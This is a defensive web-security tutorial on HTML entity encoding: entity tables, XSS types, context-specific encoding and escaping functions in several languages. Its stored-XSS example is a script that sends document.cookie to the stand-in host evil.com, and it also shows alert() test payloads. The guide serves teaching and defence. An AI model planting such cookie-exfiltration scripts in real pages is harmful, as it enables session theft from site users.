HTML Entity Encoding is one of the most fundamental and important defenses in web security. By converting special HTML characters into entity references, it prevents browsers from misinterpreting those characters as HTML tags or JavaScript code, effectively protecting against XSS (Cross-Site Scripting) attacks.
This guide covers HTML encoding principles, entity character references, XSS prevention strategies, and how to correctly use HTML encoding in different contexts.
HTML documents use angle brackets < and > to define tags. When content itself contains these characters, failing to process them causes the browser to mistake them for HTML tags, leading to rendering errors or worse—security vulnerabilities.
HTML encoding represents these special characters through entity references. There are three formats for HTML entities:
- Named entities: &amp;, &lt;, &gt;, etc. (using predefined names)
- Decimal numeric references: &#38;, &#60;, &#62;, etc. (using Unicode code points)
- Hexadecimal numeric references: &#x26;, &#x3C;, &#x3E;, etc.
For example, to display the text <script>alert('XSS')</script> on a webpage instead of executing it, you need to encode it as:
&lt;script&gt;alert('XSS')&lt;/script&gt;
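As a rough illustration of the encoding step, the sketch below uses Python's standard `html.escape`. The variable names are only for this example. Note that Python emits the hexadecimal reference `&#x27;` for the single quote, which is equivalent to `&#39;`.

```python
import html

payload = "<script>alert('XSS')</script>"

# quote=False encodes only &, < and >, which is enough for text between tags.
encoded_text = html.escape(payload, quote=False)
print(encoded_text)

# quote=True (the default) also encodes " and ', as needed inside attribute values.
encoded_attr = html.escape(payload, quote=True)
print(encoded_attr)

# Decoding restores the original text, so nothing is lost by encoding.
assert html.unescape(encoded_attr) == payload
```

A browser that receives either encoded form displays the original text and does not run it as a script.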
Five characters in HTML have special meaning and must be encoded in any HTML context:
| Character | Description | Named Entity | Decimal | Hex |
|---|---|---|---|---|
| & | Ampersand (entity start marker) | &amp; | &#38; | &#x26; |
| < | Less than (tag start) | &lt; | &#60; | &#x3C; |
| > | Greater than (tag end) | &gt; | &#62; | &#x3E; |
| " | Double quote (attribute value) | &quot; | &#34; | &#x22; |
| ' | Single quote (attribute value) | &apos; | &#39; | &#x27; |
&apos; is not defined in HTML4 but is valid in HTML5 and XML. For maximum compatibility, use &#39; instead in HTML attributes.
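The decimal and hexadecimal columns follow directly from each character's Unicode code point. The sketch below derives them in Python and checks that every form decodes back to the same character. `numeric_references` is a hypothetical helper written for this example.

```python
import html

SPECIAL_CHARS = ["&", "<", ">", '"', "'"]

def numeric_references(ch):
    """Return the (decimal, hexadecimal) numeric references for one character."""
    code_point = ord(ch)
    return f"&#{code_point};", f"&#x{code_point:X};"

for ch in SPECIAL_CHARS:
    decimal, hexadecimal = numeric_references(ch)
    # Both numeric forms decode to the original character.
    assert html.unescape(decimal) == ch
    assert html.unescape(hexadecimal) == ch
    print(ch, decimal, hexadecimal)

# An HTML5-aware decoder such as Python's also understands &apos;.
assert html.unescape("&apos;") == "'"
```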
| Character | Description | HTML Entity |
|---|---|---|
| © | Copyright symbol | &copy; |
| ® | Registered trademark | &reg; |
| ™ | Trademark | &trade; |
| € | Euro | &euro; |
| £ | Pound sterling | &pound; |
| ¥ | Yen/Chinese yuan | &yen; |
| § | Section sign | &sect; |
| ¶ | Pilcrow (paragraph) | &para; |
| • | Bullet | &bull; |
| … | Ellipsis | &hellip; |
| – | En dash | &ndash; |
| — | Em dash | &mdash; |
| Character | Description | HTML Entity |
|---|---|---|
| ± | Plus-minus sign | &plusmn; |
| × | Multiplication sign | &times; |
| ÷ | Division sign | &divide; |
| ≠ | Not equal to | &ne; |
| ≤ | Less than or equal to | &le; |
| ≥ | Greater than or equal to | &ge; |
| ∞ | Infinity | &infin; |
| ← | Left arrow | &larr; |
| → | Right arrow | &rarr; |
| ⇐ | Double left arrow | &lArr; |
| ⇒ | Double right arrow | &rArr; |
| Description | HTML Entity | Notes |
|---|---|---|
| Non-breaking space | &nbsp; | Most commonly used space entity |
| Thin space | &thinsp; | Narrower than a regular space |
| En space | &ensp; | Equal to half the font size |
| Em space | &emsp; | Equal to the font size |
| Zero-width space | &#8203; | Invisible, allows line breaks |
| Zero-width non-joiner | &zwnj; | Prevents ligatures |
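Entity names like the ones in these tables can be looked up programmatically. The sketch below uses Python's standard `html.entities.codepoint2name` table, which covers the HTML 4 names. `named_entity` is a hypothetical helper that falls back to a decimal reference when no name is listed there.

```python
import html
from html.entities import codepoint2name

def named_entity(ch):
    """Return the named entity for ch, or a decimal reference if none is listed."""
    name = codepoint2name.get(ord(ch))
    return f"&{name};" if name else f"&#{ord(ch)};"

for ch in ["©", "€", "≠", "→", "\u00a0", "\u200b"]:
    entity = named_entity(ch)
    # Every reference decodes back to the character it stands for.
    assert html.unescape(entity) == ch
    print(repr(ch), entity)
```

The zero-width space has no name in that table, so it comes out as the numeric reference `&#8203;`.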
XSS (Cross-Site Scripting) is one of the most common web application security vulnerabilities. Attackers inject malicious JavaScript into webpages, and the scripts execute when other users visit the affected page.
1. Stored XSS
Malicious scripts are permanently stored on the target server (e.g., in a database or comment system). When users visit pages containing the malicious content, the script executes automatically. This is the most dangerous type of XSS.
<!-- Content submitted by an attacker in the comments section -->
<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
2. Reflected XSS
Malicious scripts are included in URL parameters, and the server "reflects" them back in the response page. The attacker must trick users into clicking a malicious link.
<!-- URL: https://example.com/search?q=<script>alert(1)</script> -->
<!-- Server returns unencoded content: -->
<p>Search results: <script>alert(1)</script></p>
3. DOM-based XSS
The vulnerability exists entirely on the client side—JavaScript directly inserts untrusted data into the DOM without encoding.
// ❌ Dangerous: directly inserting HTML
document.getElementById('output').innerHTML = userInput;
// ✅ Safe: using textContent
document.getElementById('output').textContent = userInput;
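For the stored and reflected cases, the usual server-side fix is to encode untrusted data at the point where it is written into the page. The sketch below is a minimal Python illustration. `render_search_results` and `render_comment` are hypothetical helpers, not part of any framework, and the `comment` class name is an assumption.

```python
import html

def render_search_results(query):
    """Reflected case: encode the query parameter before echoing it back."""
    return f"<p>Search results: {html.escape(query)}</p>"

def render_comment(stored_comment):
    """Stored case: encode at output time, whatever was saved in the database."""
    return f'<div class="comment">{html.escape(stored_comment)}</div>'

print(render_search_results("<script>alert(1)</script>"))
print(render_comment("<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>"))
```

In both cases the payload reaches the browser as inert text, because no `<script>` tag survives encoding.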
HTML encoding is the core defense against XSS, but you must pay attention to the context. Different HTML contexts require different encoding strategies:
| Context | Characters to Encode | Encoding Method |
|---|---|---|
| HTML content (inside elements) | & < > | HTML entity encoding |
| HTML attribute (double-quoted) | & < > " | HTML entity encoding |
| HTML attribute (single-quoted) | & < > ' | HTML entity encoding |
| URL attribute (href, src) | URL-encode the untrusted value, then HTML-encode the whole attribute value | Two layers, one per context; also validate the URL scheme |
| JavaScript inline | Requires stricter encoding | Avoid; use frameworks instead |
| CSS inline | Special characters | Avoid |
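The attribute and URL rows can be sketched in Python as follows. This is one common arrangement, not the only one. The browser HTML-decodes the attribute before it parses the URL, so the untrusted value is percent-encoded first and the finished URL is HTML-encoded last. `attr_value` and `search_link` are hypothetical helpers, and the `page` parameter is an assumption added to show an `&` inside the URL.

```python
import html
from urllib.parse import quote

def attr_value(untrusted):
    """Encode text for a quoted HTML attribute (covers both " and ')."""
    return html.escape(untrusted, quote=True)

def search_link(untrusted_query):
    """Build an <a> tag whose href carries an untrusted query value."""
    # Layer 1: percent-encode the value for the URL query string.
    url = f"/search?q={quote(untrusted_query, safe='')}&page=2"
    # Layer 2: HTML-encode the whole URL for the attribute context.
    return f'<a href="{html.escape(url, quote=True)}">Search again</a>'

print(attr_value('" onmouseover="alert(1)'))
print(search_link("a&b <c>"))
```

Encoding alone does not stop a `javascript:` URL, so a link target that comes entirely from user input also needs a scheme check.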
Modern front-end frameworks encode output by default, greatly reducing XSS risk:
- React: {} expressions in JSX automatically HTML-encode. Only dangerouslySetInnerHTML skips encoding.
- Vue: {{ }} interpolation auto-encodes HTML. Use v-html with extra caution.
Using innerHTML, document.write(), dangerouslySetInnerHTML, or v-html to insert user input is the most common source of XSS vulnerabilities. If you must use them, always HTML-encode the content first.
// JavaScript
function escapeHtml(str) {
  // Replace & first so the entities produced below are not encoded again.
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
# Python
import html
safe = html.escape(user_input, quote=True)
// PHP
$safe = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
// Java (Apache Commons Text; note that escapeHtml4 does not encode single quotes)
import org.apache.commons.text.StringEscapeUtils;
String safe = StringEscapeUtils.escapeHtml4(userInput);
// Go
import "html"
safe := html.EscapeString(userInput)
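One detail shared by hand-written escapers like the JavaScript one above is that the ampersand has to be replaced first. The Python sketch below shows why. Both functions are hypothetical and exist only to contrast the two orderings. In real code the library call is preferable.

```python
import html

def escape_html(text):
    """Manual escaper: & is handled first, then the other four characters."""
    return (
        text.replace("&", "&amp;")
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#39;")
    )

def escape_html_wrong_order(text):
    """Buggy variant: replacing & last re-encodes the & of the &lt; just produced."""
    return text.replace("<", "&lt;").replace("&", "&amp;")

sample = "a < b & c"
print(escape_html(sample))
print(escape_html_wrong_order(sample))

# The correct ordering round-trips; the wrong one does not.
assert html.unescape(escape_html(sample)) == sample
assert html.unescape(escape_html_wrong_order(sample)) != sample
```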
These four types of encoding are often confused, but they serve completely different purposes:
| Encoding Type | Format Example | Use Case |
|---|---|---|
| HTML encoding | &lt; &gt; &amp; | Special characters in HTML documents |
| URL encoding | %3C %3E %26 | Special characters in URLs |
| JS encoding | \u003C \u003E | Special characters in JavaScript strings |
| Base64 encoding | PGh0bWw+ | Binary data to text |
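Key principle: Apply only the encoding that each target context requires. Each encoding corresponds to a specific parsing rule, so a mismatch causes display errors: text that is HTML-encoded twice shows a literal &lt; on the page, and URL-encoded text placed in HTML content shows a literal %3C. Nested contexts, such as a URL inside an href attribute, are the one case where each layer needs its own encoding.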
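To make the distinction concrete, the sketch below produces each encoding from the table using only Python's standard library and then shows that a decoder for one scheme leaves another scheme's output untouched. The JavaScript escape is built by hand from the code point, since this is an illustration, not a full JavaScript string encoder.

```python
import base64
import html
from urllib.parse import quote, unquote

ch = "<"
html_form = html.escape(ch)                                  # HTML entity
url_form = quote(ch, safe="")                                # percent-encoding
js_form = f"\\u{ord(ch):04X}"                                # JavaScript \uXXXX escape
b64_form = base64.b64encode(b"<html>").decode("ascii")       # Base64 of the bytes of "<html>"

print(html_form, url_form, js_form, b64_form)

# Each decoder only understands its own scheme.
assert html.unescape(url_form) == url_form   # an HTML parser does not decode %3C
assert unquote(html_form) == html_form       # a URL parser does not decode &lt;

# Applying the same encoding twice changes what the reader sees.
assert html.unescape(html.escape(html_form)) == "&lt;"
```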
HTML encoding is the cornerstone of web security. Master these key points to effectively defend against the vast majority of XSS attacks:
- Avoid inserting user input through innerHTML and dangerouslySetInnerHTML; prefer textContent or the framework's default interpolation.